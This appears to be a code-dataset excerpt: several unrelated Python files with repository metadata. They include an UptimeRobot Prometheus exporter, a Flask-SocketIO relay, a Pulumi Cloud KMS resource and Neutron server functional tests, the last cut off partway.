client = QuestionAnsweringClient(qna_account, AzureKeyCredential(qna_key))
params = {
"question": "How long it takes to charge surface?",
"records": [
{
"text": "Power and charging. It takes two to four hours to charge the Surface Pro 4 battery fully from an empty state. " +
"It can take longer if you’re using your Surface for power-intensive activities like gaming or video streaming while you’re charging it.",
"id": "1"
},
{
"text": "You can use the USB port on your Surface Pro 4 power supply to charge other devices, like a phone, while your Surface charges. "+
"The USB port on the power supply is only for charging, not for data transfer. If you want to use a USB device, plug it into the USB port on your Surface.",
"id": "2"
}
],
"language": "en"
}
async with client:
output = await client.query_text(params)
assert len(output.answers) == 3
confident_answers = [a for a in output.answers if a.confidence_score > 0.9]
assert len(confident_answers) == 2
assert confident_answers[0].answer_span.text == "two to four hours"
| 149.984496
| 6,497
| 0.729016
|
4a04f2ec50bbd3e759789a30aeb19903eac149ac
| 5,138
|
py
|
Python
|
files/exporter.py
|
astlz96/uptimerobot_exporter
|
dc27555fa50de1fa45dc8718af0f3846dde9b5e2
|
[
"Apache-2.0"
] | null | null | null |
files/exporter.py
|
astlz96/uptimerobot_exporter
|
dc27555fa50de1fa45dc8718af0f3846dde9b5e2
|
[
"Apache-2.0"
] | null | null | null |
files/exporter.py
|
astlz96/uptimerobot_exporter
|
dc27555fa50de1fa45dc8718af0f3846dde9b5e2
|
[
"Apache-2.0"
] | null | null | null |
# FROM https://github.com/hnrd/uptimerobot_exporter/blob/master/exporter.py
# Updated by Martin LEKPA
import argparse
import http.server
import os
import requests
## Monitors
def _fetch_paginated(offset, api_key):
params = {
'api_key': api_key,
'format': 'json',
'response_times': 1,
'response_times_limit': 1,
'offset': offset,
}
return requests.post(
'https://api.uptimerobot.com/v2/getMonitors',
data=params,
).json()
def fetch_data(api_key):
monitors = {'monitors':[]}
offset = 0
response = _fetch_paginated(offset, api_key)
for monitor in response['monitors']:
monitors['monitors'].append(monitor)
while response['monitors']:
offset = offset + 50
response = _fetch_paginated(offset, api_key)
for monitor in response['monitors']:
monitors['monitors'].append(monitor)
return monitors
def format_prometheus(data):
result = ''
for item in data:
if item.get('status') == 0:
value = 2
elif item.get('status') == 1:
value = 1
elif item.get('status') == 2:
value = 0
else:
value = 3
result += 'uptimerobot_status{{c1_name="{}",c2_url="{}",c3_type="{}",c4_sub_type="{}",c5_keyword_type="{}",c6_keyword_value="{}",c7_http_username="{}",c8_port="{}",c9_interval="{}"}} {}\n'.format(
item.get('friendly_name'),
item.get('url'),
item.get('type'),
item.get('sub_type'),
item.get('keyword_type'),
item.get('keyword_value'),
item.get('http_username'),
item.get('port'),
item.get('interval'),
value,
)
if item.get('status', 0) == 2:
result += 'uptimerobot_response_time{{name="{}",type="{}",url="{}"}} {}\n'.format(
item.get('friendly_name'),
item.get('type'),
item.get('url'),
item.get('response_times').pop().get('value'),
)
return result
## getAccountDetails
def fetch_accountdetails(api_key):
params = {
'api_key': api_key,
'format': 'json',
}
req = requests.post(
'https://api.uptimerobot.com/v2/getAccountDetails',
data=params,
)
return req.json()
def format_prometheus_accountdetails(data):
result = 'uptimerobot_accountdetails{name="%s",monitor_limit="%s",monitor_interval="%s",up_monitors="%s",down_monitors="%s",paused_monitors="%s"} 1\n' %(data['email'],data['monitor_limit'],data['monitor_interval'],data['up_monitors'],data['down_monitors'],data['paused_monitors'])
return result
## End
## public status pages
def fetch_psp(api_key):
params = {
'api_key': api_key,
'format': 'json',
}
req = requests.post(
'https://api.uptimerobot.com/v2/getPSPs',
data=params,
)
return req.json()
def format_prometheus_psp(data):
result = ''
for item in data:
result += 'uptimerobot_psp{{c1_name="{}",c2_custom_url="{}",c3_standard_url="{}",c4_monitors="{}",c5_sort="{}"}} {}\n'.format(item.get('friendly_name'),item.get('custom_url'),item.get('standard_url'),item.get('monitors'),item.get('sort'),item.get('status'))
return result
## End
class ReqHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
answer = fetch_data(api_key)
accountdetails = fetch_accountdetails(api_key)
psp = fetch_psp(api_key)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(
format_prometheus(answer.get('monitors')).encode('utf-8')
)
self.wfile.write(
format_prometheus_accountdetails(accountdetails.get('account')).encode('utf-8')
)
self.wfile.write(
format_prometheus_psp(psp.get('psps')).encode('utf-8')
)
if __name__ == '__main__':
if 'UPTIMEROBOT_API_KEY' in os.environ:
api_key = os.environ.get('UPTIMEROBOT_API_KEY')
server_name = os.environ.get('UPTIMEROBOT_SERVER_NAME', '0.0.0.0')
server_port = int(os.environ.get('UPTIMEROBOT_SERVER_PORT', '9705'))
else:
parser = argparse.ArgumentParser(
description='Export all check results from uptimerobot.txt'
'for prometheus scraping.'
)
parser.add_argument(
'apikey',
help='Your uptimerobot.com API key. See account details.'
)
parser.add_argument(
'--server_name', '-s',
default='0.0.0.0',
help='Server address to bind to.'
)
parser.add_argument(
'--server_port', '-p',
default=9705,
type=int,
help='Port to bind to.'
)
args = parser.parse_args()
api_key = args.apikey
server_name = args.server_name
server_port = args.server_port
httpd = http.server.HTTPServer((server_name, server_port), ReqHandler)
httpd.serve_forever()
| 29.36
| 284
| 0.584079
|
4a04f311927921702e2609b21a37d0a9520597b7
| 1,548
|
py
|
Python
|
dcu/active_memory/__init__.py
|
dirkcuys/active-memory
|
ab226c7b636550823a9c91e3ebd81776d255f204
|
[
"MIT"
] | 5
|
2019-05-01T19:38:54.000Z
|
2021-06-28T22:04:33.000Z
|
dcu/active_memory/__init__.py
|
dirkcuys/s3-backup-rotate
|
ab226c7b636550823a9c91e3ebd81776d255f204
|
[
"MIT"
] | null | null | null |
dcu/active_memory/__init__.py
|
dirkcuys/s3-backup-rotate
|
ab226c7b636550823a9c91e3ebd81776d255f204
|
[
"MIT"
] | null | null | null |
from dcu.active_memory.rotate import rotate
from dcu.active_memory.rotate import splitext
from dcu.active_memory.upload import upload
import os.path
import re
import logging
logger = logging.getLogger(__name__)
def upload_rotate(file_path, s3_bucket, s3_key_prefix, aws_key=None, aws_secret=None):
'''
Upload file_path to s3 bucket with prefix
Ex. upload_rotate('/tmp/file-2015-01-01.tar.bz2', 'backups', 'foo.net/')
would upload file to bucket backups with key=foo.net/file-2015-01-01.tar.bz2
and then rotate all files starting with foo.net/file and with extension .tar.bz2
Timestamps need to be present between the file root and the extension and in the same format as strftime("%Y-%m-%d").
Ex file-2015-12-28.tar.bz2
'''
key = ''.join([s3_key_prefix, os.path.basename(file_path)])
logger.debug("Uploading {0} to {1}".format(file_path, key))
upload(file_path, s3_bucket, key, aws_access_key_id=aws_key, aws_secret_access_key=aws_secret)
file_root, file_ext = splitext(os.path.basename(file_path))
# strip timestamp from file_base
regex = '(?P<filename>.*)-(?P<year>[\d]+?)-(?P<month>[\d]+?)-(?P<day>[\d]+?)'
match = re.match(regex, file_root)
if not match:
raise Exception('File does not contain a timestamp')
key_prefix = ''.join([s3_key_prefix, match.group('filename')])
logger.debug('Rotating files on S3 with key prefix {0} and extension {1}'.format(key_prefix, file_ext))
rotate(key_prefix, file_ext, s3_bucket, aws_key=aws_key, aws_secret=aws_secret)
| 45.529412
| 121
| 0.718992
|
4a04f31d5b8ba127fdec10f31c16db4384b6b4d5
| 115
|
py
|
Python
|
jeecf/exceptions.py
|
cgfly/jeecf-cli
|
65b1577ea1ca169c8e296a7df15d13b7d9b84e12
|
[
"Apache-2.0"
] | 2
|
2019-04-05T07:48:42.000Z
|
2019-07-26T10:42:25.000Z
|
jeecf/exceptions.py
|
cgfly/jeecf-cli
|
65b1577ea1ca169c8e296a7df15d13b7d9b84e12
|
[
"Apache-2.0"
] | null | null | null |
jeecf/exceptions.py
|
cgfly/jeecf-cli
|
65b1577ea1ca169c8e296a7df15d13b7d9b84e12
|
[
"Apache-2.0"
] | 1
|
2019-11-28T09:55:16.000Z
|
2019-11-28T09:55:16.000Z
|
class JeecfNotLoginException(Exception):
def __str__(self):
return "You need run 'jeecf login' first!"
| 28.75
| 50
| 0.704348
|
4a04f3425ea2361ef7c989c88d94ba8bf15fc78d
| 1,013
|
py
|
Python
|
server/app.py
|
Marcos-Seafloor/video-streamer-multi-container
|
d0628fbf9f633363686b444ad0cc8dd813426a10
|
[
"Apache-2.0"
] | 51
|
2020-05-30T06:34:21.000Z
|
2022-03-03T05:05:52.000Z
|
server/app.py
|
Marcos-Seafloor/video-streamer-multi-container
|
d0628fbf9f633363686b444ad0cc8dd813426a10
|
[
"Apache-2.0"
] | 3
|
2021-07-19T21:20:39.000Z
|
2021-11-17T02:55:05.000Z
|
server/app.py
|
Marcos-Seafloor/video-streamer-multi-container
|
d0628fbf9f633363686b444ad0cc8dd813426a10
|
[
"Apache-2.0"
] | 21
|
2020-06-12T13:17:34.000Z
|
2021-11-10T15:14:54.000Z
|
from flask_socketio import SocketIO
from flask import Flask, render_template, request
app = Flask(__name__)
socketio = SocketIO(app)
@app.route('/')
def index():
"""Home page."""
return render_template('index.html')
@socketio.on('connect', namespace='/web')
def connect_web():
print('[INFO] Web client connected: {}'.format(request.sid))
@socketio.on('disconnect', namespace='/web')
def disconnect_web():
print('[INFO] Web client disconnected: {}'.format(request.sid))
@socketio.on('connect', namespace='/cv')
def connect_cv():
print('[INFO] CV client connected: {}'.format(request.sid))
@socketio.on('disconnect', namespace='/cv')
def disconnect_cv():
print('[INFO] CV client disconnected: {}'.format(request.sid))
@socketio.on('cv2server')
def handle_cv_message(message):
socketio.emit('server2web', message, namespace='/web')
if __name__ == "__main__":
print('[INFO] Starting server at http://localhost:5001')
socketio.run(app=app, host='0.0.0.0', port=5001)
| 24.119048
| 67
| 0.69003
|
4a04f39bb2919764e23d67b444421b15b8ee8bdb
| 483
|
py
|
Python
|
home/migrations/0002_auto_20190501_1313.py
|
ageorgiev97/fictional-octo-meme
|
afc0f69985c0e79f128cf1bdafa668a9a22a2f0f
|
[
"MIT"
] | null | null | null |
home/migrations/0002_auto_20190501_1313.py
|
ageorgiev97/fictional-octo-meme
|
afc0f69985c0e79f128cf1bdafa668a9a22a2f0f
|
[
"MIT"
] | null | null | null |
home/migrations/0002_auto_20190501_1313.py
|
ageorgiev97/fictional-octo-meme
|
afc0f69985c0e79f128cf1bdafa668a9a22a2f0f
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2 on 2019-05-01 10:13
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('home', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='restaurant',
name='location',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='home.Location'),
),
]
| 24.15
| 124
| 0.637681
|
4a04f3bf24e3b6fd33a483c05552dc7c9fb9962d
| 13,239
|
py
|
Python
|
sdk/python/pulumi_google_native/cloudkms/v1/import_job.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/cloudkms/v1/import_job.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/cloudkms/v1/import_job.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = ['ImportJobArgs', 'ImportJob']
@pulumi.input_type
class ImportJobArgs:
def __init__(__self__, *,
import_job_id: pulumi.Input[str],
import_method: pulumi.Input['ImportJobImportMethod'],
key_ring_id: pulumi.Input[str],
protection_level: pulumi.Input['ImportJobProtectionLevel'],
location: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ImportJob resource.
:param pulumi.Input['ImportJobImportMethod'] import_method: Immutable. The wrapping method to be used for incoming key material.
:param pulumi.Input['ImportJobProtectionLevel'] protection_level: Immutable. The protection level of the ImportJob. This must match the protection_level of the version_template on the CryptoKey you attempt to import into.
"""
pulumi.set(__self__, "import_job_id", import_job_id)
pulumi.set(__self__, "import_method", import_method)
pulumi.set(__self__, "key_ring_id", key_ring_id)
pulumi.set(__self__, "protection_level", protection_level)
if location is not None:
pulumi.set(__self__, "location", location)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="importJobId")
def import_job_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "import_job_id")
@import_job_id.setter
def import_job_id(self, value: pulumi.Input[str]):
pulumi.set(self, "import_job_id", value)
@property
@pulumi.getter(name="importMethod")
def import_method(self) -> pulumi.Input['ImportJobImportMethod']:
"""
Immutable. The wrapping method to be used for incoming key material.
"""
return pulumi.get(self, "import_method")
@import_method.setter
def import_method(self, value: pulumi.Input['ImportJobImportMethod']):
pulumi.set(self, "import_method", value)
@property
@pulumi.getter(name="keyRingId")
def key_ring_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "key_ring_id")
@key_ring_id.setter
def key_ring_id(self, value: pulumi.Input[str]):
pulumi.set(self, "key_ring_id", value)
@property
@pulumi.getter(name="protectionLevel")
def protection_level(self) -> pulumi.Input['ImportJobProtectionLevel']:
"""
Immutable. The protection level of the ImportJob. This must match the protection_level of the version_template on the CryptoKey you attempt to import into.
"""
return pulumi.get(self, "protection_level")
@protection_level.setter
def protection_level(self, value: pulumi.Input['ImportJobProtectionLevel']):
pulumi.set(self, "protection_level", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
class ImportJob(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
import_job_id: Optional[pulumi.Input[str]] = None,
import_method: Optional[pulumi.Input['ImportJobImportMethod']] = None,
key_ring_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
protection_level: Optional[pulumi.Input['ImportJobProtectionLevel']] = None,
__props__=None):
"""
Create a new ImportJob within a KeyRing. ImportJob.import_method is required.
Auto-naming is currently not supported for this resource.
Note - this resource's API doesn't support deletion. When deleted, the resource will persist
on Google Cloud even though it will be deleted from Pulumi state.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input['ImportJobImportMethod'] import_method: Immutable. The wrapping method to be used for incoming key material.
:param pulumi.Input['ImportJobProtectionLevel'] protection_level: Immutable. The protection level of the ImportJob. This must match the protection_level of the version_template on the CryptoKey you attempt to import into.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ImportJobArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a new ImportJob within a KeyRing. ImportJob.import_method is required.
Auto-naming is currently not supported for this resource.
Note - this resource's API doesn't support deletion. When deleted, the resource will persist
on Google Cloud even though it will be deleted from Pulumi state.
:param str resource_name: The name of the resource.
:param ImportJobArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ImportJobArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
import_job_id: Optional[pulumi.Input[str]] = None,
import_method: Optional[pulumi.Input['ImportJobImportMethod']] = None,
key_ring_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
protection_level: Optional[pulumi.Input['ImportJobProtectionLevel']] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ImportJobArgs.__new__(ImportJobArgs)
if import_job_id is None and not opts.urn:
raise TypeError("Missing required property 'import_job_id'")
__props__.__dict__["import_job_id"] = import_job_id
if import_method is None and not opts.urn:
raise TypeError("Missing required property 'import_method'")
__props__.__dict__["import_method"] = import_method
if key_ring_id is None and not opts.urn:
raise TypeError("Missing required property 'key_ring_id'")
__props__.__dict__["key_ring_id"] = key_ring_id
__props__.__dict__["location"] = location
__props__.__dict__["project"] = project
if protection_level is None and not opts.urn:
raise TypeError("Missing required property 'protection_level'")
__props__.__dict__["protection_level"] = protection_level
__props__.__dict__["attestation"] = None
__props__.__dict__["create_time"] = None
__props__.__dict__["expire_event_time"] = None
__props__.__dict__["expire_time"] = None
__props__.__dict__["generate_time"] = None
__props__.__dict__["name"] = None
__props__.__dict__["public_key"] = None
__props__.__dict__["state"] = None
super(ImportJob, __self__).__init__(
'google-native:cloudkms/v1:ImportJob',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ImportJob':
"""
Get an existing ImportJob resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ImportJobArgs.__new__(ImportJobArgs)
__props__.__dict__["attestation"] = None
__props__.__dict__["create_time"] = None
__props__.__dict__["expire_event_time"] = None
__props__.__dict__["expire_time"] = None
__props__.__dict__["generate_time"] = None
__props__.__dict__["import_method"] = None
__props__.__dict__["name"] = None
__props__.__dict__["protection_level"] = None
__props__.__dict__["public_key"] = None
__props__.__dict__["state"] = None
return ImportJob(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def attestation(self) -> pulumi.Output['outputs.KeyOperationAttestationResponse']:
"""
Statement that was generated and signed by the key creator (for example, an HSM) at key creation time. Use this statement to verify attributes of the key as stored on the HSM, independently of Google. Only present if the chosen ImportMethod is one with a protection level of HSM.
"""
return pulumi.get(self, "attestation")
@property
@pulumi.getter(name="createTime")
def create_time(self) -> pulumi.Output[str]:
"""
The time at which this ImportJob was created.
"""
return pulumi.get(self, "create_time")
@property
@pulumi.getter(name="expireEventTime")
def expire_event_time(self) -> pulumi.Output[str]:
"""
The time this ImportJob expired. Only present if state is EXPIRED.
"""
return pulumi.get(self, "expire_event_time")
@property
@pulumi.getter(name="expireTime")
def expire_time(self) -> pulumi.Output[str]:
"""
The time at which this ImportJob is scheduled for expiration and can no longer be used to import key material.
"""
return pulumi.get(self, "expire_time")
@property
@pulumi.getter(name="generateTime")
def generate_time(self) -> pulumi.Output[str]:
"""
The time this ImportJob's key material was generated.
"""
return pulumi.get(self, "generate_time")
@property
@pulumi.getter(name="importMethod")
def import_method(self) -> pulumi.Output[str]:
"""
Immutable. The wrapping method to be used for incoming key material.
"""
return pulumi.get(self, "import_method")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name for this ImportJob in the format `projects/*/locations/*/keyRings/*/importJobs/*`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="protectionLevel")
def protection_level(self) -> pulumi.Output[str]:
"""
Immutable. The protection level of the ImportJob. This must match the protection_level of the version_template on the CryptoKey you attempt to import into.
"""
return pulumi.get(self, "protection_level")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> pulumi.Output['outputs.WrappingPublicKeyResponse']:
"""
The public key with which to wrap key material prior to import. Only returned if state is ACTIVE.
"""
return pulumi.get(self, "public_key")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the ImportJob, indicating if it can be used.
"""
return pulumi.get(self, "state")
| 43.693069
| 287
| 0.653373
|
4a04f4352876c0d54cf6cc02d56c07a5d43a2512
| 1,521
|
py
|
Python
|
efren-graphs.py
|
luis9614/kidney-linces
|
192c2f6f56a957c3eee5b8242093d67ebbe59f78
|
[
"MIT"
] | null | null | null |
efren-graphs.py
|
luis9614/kidney-linces
|
192c2f6f56a957c3eee5b8242093d67ebbe59f78
|
[
"MIT"
] | null | null | null |
efren-graphs.py
|
luis9614/kidney-linces
|
192c2f6f56a957c3eee5b8242093d67ebbe59f78
|
[
"MIT"
] | null | null | null |
import pandas as pd
"""df = pd.read_csv('renal.csv', header=None) Para iterar solo con indices"""
df = pd.read_csv('renal.csv')
columns = ['age','bp','sg','al','su','rbc','pc','pcc','ba','bgr','bu','sc','sod','pot','hemo','pcv','wc','rc','htn','dm','cad','appet','pe','ane']
def name_frec(filename, name, ignore=[]):
file = pd.read_csv(filename)
frec = {}
for i in range(1, file[name].size):
if file[name][i] in ignore:
continue
if file[name][i] in frec:
frec[file[name][i]] = frec[file[name][i]] + 1
else:
frec[file[name][i]] = 1
return frec
def name_frec_check(filename, name, ignore=[]):
file = pd.read_csv(filename)
frec_c = {}
frec_n = {}
for i in range(1, file[name].size):
if file['class'][i] == 'ckd':
if file[name][i] in ignore:
continue
if file[name][i] in frec_c:
frec_c[file[name][i]] = frec_c[file[name][i]] + 1
else:
frec_c[file[name][i]] = 1
else:
if file[name][i] in ignore:
continue
if file[name][i] in frec_n:
frec_n[file[name][i]] = frec_n[file[name][i]] + 1
else:
frec_n[file[name][i]] = 1
return frec_c, frec_n
"""print(name_frec('renal.csv', 'ba'))
print(name_frec('renal.csv', 'pcc'))
print(name_frec('renal.csv', 'su', ['?']))"""
for name in columns:
print(name, name_frec_check('renal.csv', name, ['?']))
| 31.6875
| 146
| 0.518738
|
4a04f4398328c42b48fbbd77ff1fe0d6f79c39bc
| 10,794
|
py
|
Python
|
neutron/tests/functional/test_server.py
|
FreeBSD-UPB/neutron
|
19372a3cd8b4e6e45f707753b914e133857dd629
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/functional/test_server.py
|
FreeBSD-UPB/neutron
|
19372a3cd8b4e6e45f707753b914e133857dd629
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/functional/test_server.py
|
FreeBSD-UPB/neutron
|
19372a3cd8b4e6e45f707753b914e133857dd629
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import signal
import socket
import time
import traceback
from unittest import mock
import httplib2
from neutron_lib import worker as neutron_worker
from oslo_config import cfg
from oslo_log import log
import psutil
from neutron.common import utils
from neutron import manager
from neutron import service
from neutron.tests import base as tests_base
from neutron.tests.functional import base
from neutron import wsgi
LOG = log.getLogger(__name__)
CONF = cfg.CONF
# Those messages will be written to temporary file each time
# start/reset methods are called.
FAKE_START_MSG = 'start'
FAKE_RESET_MSG = 'reset'
TARGET_PLUGIN = 'neutron.plugins.ml2.plugin.Ml2Plugin'
class TestNeutronServer(base.BaseLoggingTestCase):
def setUp(self):
super(TestNeutronServer, self).setUp()
self.service_pid = None
self.workers = None
self._mp_queue = multiprocessing.Queue()
self.health_checker = self._check_active
self.pipein, self.pipeout = os.pipe()
self.addCleanup(self._destroy_workers)
def _destroy_workers(self):
if self.service_pid:
# Make sure all processes are stopped
os.kill(self.service_pid, signal.SIGKILL)
def _start_server(self, callback, workers):
"""Run a given service.
:param callback: callback that will start the required service
:param workers: number of service workers
:returns: list of spawned workers' pids
"""
self.workers = workers
# Fork a new process in which server will be started
pid = os.fork()
if pid == 0:
status = 0
try:
callback(workers)
except SystemExit as exc:
status = exc.code
except BaseException:
traceback.print_exc()
status = 2
# Really exit
os._exit(status)
self.service_pid = pid
# If number of workers is 1 it is assumed that we run
# a service in the current process.
if self.workers > 1:
# Wait at most 10 seconds to spawn workers
condition = lambda: self.workers == len(self._get_workers())
utils.wait_until_true(
condition, timeout=10, sleep=0.1,
exception=RuntimeError(
"Failed to start %d workers." % self.workers))
workers = self._get_workers()
self.assertEqual(len(workers), self.workers)
return workers
# Wait for a service to start.
utils.wait_until_true(self.health_checker, timeout=10, sleep=0.1,
exception=RuntimeError(
"Failed to start service."))
return [self.service_pid]
def _get_workers(self):
"""Get the list of processes in which WSGI server is running."""
def safe_ppid(proc):
try:
return proc.ppid()
except psutil.NoSuchProcess:
return None
if self.workers > 1:
return [proc.pid for proc in psutil.process_iter()
if safe_ppid(proc) == self.service_pid]
else:
return [proc.pid for proc in psutil.process_iter()
if proc.pid == self.service_pid]
def _check_active(self):
"""Dummy service activity check."""
time.sleep(5)
return True
def _fake_start(self):
self._mp_queue.put(FAKE_START_MSG)
def _fake_reset(self):
self._mp_queue.put(FAKE_RESET_MSG)
def _test_restart_service_on_sighup(self, service, workers=1):
"""Test that a service correctly (re)starts on receiving SIGHUP.
1. Start a service with a given number of workers.
2. Send SIGHUP to the service.
3. Wait for workers (if any) to (re)start.
"""
self._start_server(callback=service, workers=workers)
os.kill(self.service_pid, signal.SIGHUP)
# After sending SIGHUP it is expected that there will be as many
# FAKE_RESET_MSG as number of workers + one additional for main
# process
expected_msg = (
FAKE_START_MSG * workers + FAKE_RESET_MSG * (workers + 1))
# Wait for temp file to be created and its size reaching the expected
# value
expected_size = len(expected_msg)
ret_msg = ''
def is_ret_buffer_ok():
nonlocal ret_msg
LOG.debug('Checking returned buffer size')
while not self._mp_queue.empty():
ret_msg += self._mp_queue.get()
LOG.debug('Size of buffer is %s. Expected size: %s',
len(ret_msg), expected_size)
return len(ret_msg) == expected_size
try:
utils.wait_until_true(is_ret_buffer_ok, timeout=5, sleep=1)
except utils.WaitTimeout:
raise RuntimeError('Expected buffer size: %s, current size: %s' %
(len(ret_msg), expected_size))
# Verify that start has been called twice for each worker (one for
# initial start, and the second one on SIGHUP after children were
# terminated).
self.assertEqual(expected_msg, ret_msg)
class TestWsgiServer(TestNeutronServer):
"""Tests for neutron.wsgi.Server."""
def setUp(self):
super(TestWsgiServer, self).setUp()
self.health_checker = self._check_active
self.port = None
@staticmethod
def application(environ, start_response):
"""A primitive test application."""
response_body = 'Response'
status = '200 OK'
response_headers = [('Content-Type', 'text/plain'),
('Content-Length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def _check_active(self):
"""Check a wsgi service is active by making a GET request."""
port = int(os.read(self.pipein, 5))
conn = httplib2.HTTPConnectionWithTimeout("localhost", port)
try:
conn.request("GET", "/")
resp = conn.getresponse()
return resp.status == 200
except socket.error:
return False
def _run_wsgi(self, workers=1):
"""Start WSGI server with a test application."""
# Mock start method to check that children are started again on
# receiving SIGHUP.
with mock.patch("neutron.wsgi.WorkerService.start") as start_method,\
mock.patch("neutron.wsgi.WorkerService.reset") as reset_method:
start_method.side_effect = self._fake_start
reset_method.side_effect = self._fake_reset
server = wsgi.Server("Test")
server.start(self.application, 0, "0.0.0.0",
workers=workers)
# Memorize a port that was chosen for the service
self.port = server.port
os.write(self.pipeout, bytes(str(self.port), 'utf-8'))
server.wait()
@tests_base.unstable_test('bug 1930367')
def test_restart_wsgi_on_sighup_multiple_workers(self):
self._test_restart_service_on_sighup(service=self._run_wsgi,
workers=2)
class TestRPCServer(TestNeutronServer):
"""Tests for neutron RPC server."""
def setUp(self):
super(TestRPCServer, self).setUp()
self.setup_coreplugin('ml2', load_plugins=False)
self._plugin_patcher = mock.patch(TARGET_PLUGIN, autospec=True)
self.plugin = self._plugin_patcher.start()
self.plugin.return_value.rpc_workers_supported = True
def _serve_rpc(self, workers=1):
"""Start RPC server with a given number of workers."""
# Mock start method to check that children are started again on
# receiving SIGHUP.
with mock.patch("neutron.service.RpcWorker.start") as start_method,\
mock.patch(
"neutron.service.RpcWorker.reset") as reset_method,\
mock.patch(
"neutron_lib.plugins.directory.get_plugin") as get_plugin:
start_method.side_effect = self._fake_start
reset_method.side_effect = self._fake_reset
get_plugin.return_value = self.plugin
CONF.set_override("rpc_workers", workers)
# not interested in state report workers specifically
CONF.set_override("rpc_state_report_workers", 0)
rpc_workers_launcher = service.start_rpc_workers()
rpc_workers_launcher.wait()
def test_restart_rpc_on_sighup_multiple_workers(self):
self._test_restart_service_on_sighup(service=self._serve_rpc,
workers=2)
class TestPluginWorker(TestNeutronServer):
"""Ensure that a plugin returning Workers spawns workers"""
def setUp(self):
super(TestPluginWorker, self).setUp()
self.setup_coreplugin('ml2', load_plugins=False)
self._plugin_patcher = mock.patch(TARGET_PLUGIN, autospec=True)
self.plugin = self._plugin_patcher.start()
manager.init()
def _start_plugin(self, workers=1):
with mock.patch('neutron_lib.plugins.directory.get_plugin') as gp:
gp.return_value = self.plugin
plugin_workers_launcher = service.start_plugins_workers()
plugin_workers_launcher.wait()
def test_start(self):
class FakeWorker(neutron_worker.BaseWorker):
def start(self):
pass
def wait(self):
pass
